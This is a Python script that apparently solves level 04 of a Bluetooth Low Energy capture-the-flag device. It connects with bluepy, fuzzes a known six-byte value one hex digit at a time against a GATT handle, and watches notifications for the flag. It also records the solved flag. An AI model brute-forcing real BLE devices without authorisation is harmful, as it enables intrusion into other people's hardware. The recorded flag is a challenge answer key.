#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
import itertools
  
'''
42  0x2A   READ         Handle 0x002C takes value AABBCCDDEEFF. Fuzz a variant of this to find the flag!
44  0x2C   NOTIFY WRITE 
46  0x2E   READ WRITE   write here to go to the scoreboard

Flag: f401f21d02fdd0a4fc00
'''

# Most recent notification payload: written by MyDelegate.handleNotification,
# read by the main loop once waitForNotifications() reports data.
notificationData = ''

class MyDelegate(btle.DefaultDelegate):
  """Notification sink that parks the latest payload in module-level notificationData.

  The handle passed to the constructor is kept in ``self.hndl`` but is not
  consulted when a notification arrives: any notification, whatever its
  source handle, overwrites the stored payload.
  """

  def __init__(self, hndl):
    # Explicit base-class call kept as written; it works whether the base is
    # an old- or new-style class on Python 2.
    btle.DefaultDelegate.__init__(self)
    self.hndl = hndl

  def handleNotification(self, cHandle, data):
    """Store *data* for the main loop; *cHandle* is accepted but ignored."""
    global notificationData
    notificationData = data

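# Target address comes from ctf_mac.txt; read() keeps the trailing newline,
# so strip it, and close the file instead of leaking the handle.
with open('ctf_mac.txt') as macfile:
  deviceMAC = macfile.read().strip()
p = btle.Peripheral(deviceMAC)

print("Attached to peripheral")

print("Loading level 04")
# Level selector payload: the two bytes 00 04 (the original built this as
# '%0*x' % (4, 4), which is just "0004").
hex1 = binascii.unhexlify("0004")
try:
  p.writeCharacteristic(0x30, hex1, withResponse=False)
finally:
  # Always release the connection, as the main loop below does, so a failed
  # write does not leave the peripheral half-attached.
  p.disconnect()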

'''
# of course not, this brute-force would make sense!
charset = "01234565789ABCDEF"
generator = itertools.chain.from_iterable((''.join(l)
  for l in itertools.product(charset, repeat=i))
  for i in range(4,5))
'''

'''
# not this!
print("Generating wordlist")
charset = "01234565789ABCDEF"
generator = itertools.chain.from_iterable((''.join(l)
  for l in itertools.product(charset, repeat=i))
  for i in range(12,13))
'''

print("Generating wordlist")
charset = list("0123456789ABCDEF")
origPass = list("AABBCCDDEEFF")
# Candidate list: the known value with exactly one position replaced by each
# hex digit, positions in order and digits 0..F in order.  Each position also
# reproduces the original value once, so the list has
# len(origPass) * len(charset) entries including twelve copies of the original.
generator = [
  "".join(origPass[:pos] + [digit] + origPass[pos + 1:])
  for pos in range(len(origPass))
  for digit in charset
]

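# Upper bound on one-second waitForNotifications() rounds per candidate.  The
# loop used to spin forever if no notification ever arrived; now it reports
# the silent candidate and moves on.
MAX_WAITS = 30

for password in generator:
  # unhexlify() already returns the raw bytes on Python 2 and 3.  The former
  # str() wrapper was a no-op on 2 but on 3 would have sent the text
  # "b'\xaa...'" rather than the six bytes.
  payload = binascii.unhexlify(password)

  # Re-read the target address each round as before, but close the file and
  # drop the trailing newline that read() keeps.
  with open('ctf_mac.txt') as macfile:
    deviceMAC = macfile.read().strip()
  p = btle.Peripheral(deviceMAC)

  try:
    # list() so indexing works even if getServices() returns a view on Python 3.
    srvs = list(p.getServices())
    chs = srvs[2].getCharacteristics()
    ch = chs[1]
    # NOTE(review): assumes the CCCD sits right after the value handle --
    # confirm against the device's GATT table.
    cccd = ch.valHandle + 1

    p.setDelegate(MyDelegate(ch.getHandle()))
    # Result was never used; the call is kept in case it drives discovery.
    p.getServiceByUUID(0x00FF)
    p.writeCharacteristic(cccd, b"\x01\x00")  # subscribe to notifications

    sys.stdout.write("\rTrying: %s" % password.rstrip())
    sys.stdout.flush()  # make the \r progress line visible immediately
    p.writeCharacteristic(0x2C, payload)

    waits = 0
    while True:
      if p.waitForNotifications(1.0):
        # A response equal to the candidate (compared as upper-case hex with
        # zeros stripped on both sides) is treated as a miss; anything else
        # is taken to be the flag.
        echoed = binascii.b2a_hex(notificationData).decode("ascii")
        if password.strip("0") != echoed.strip("0").upper():
          flag = notificationData.rstrip()
          if not isinstance(flag, str):  # bytes on Python 3
            flag = flag.decode("utf-8", "replace")
          print("\nFlag: %s" % flag)
          sys.exit()  # SystemExit still runs the finally: below
        break  # plain echo: next candidate
      waits += 1
      if waits >= MAX_WAITS:
        print("\nNo notification for %s after %d s; skipping" % (password, MAX_WAITS))
        break
      print("Waiting...")
  finally:
    p.disconnect()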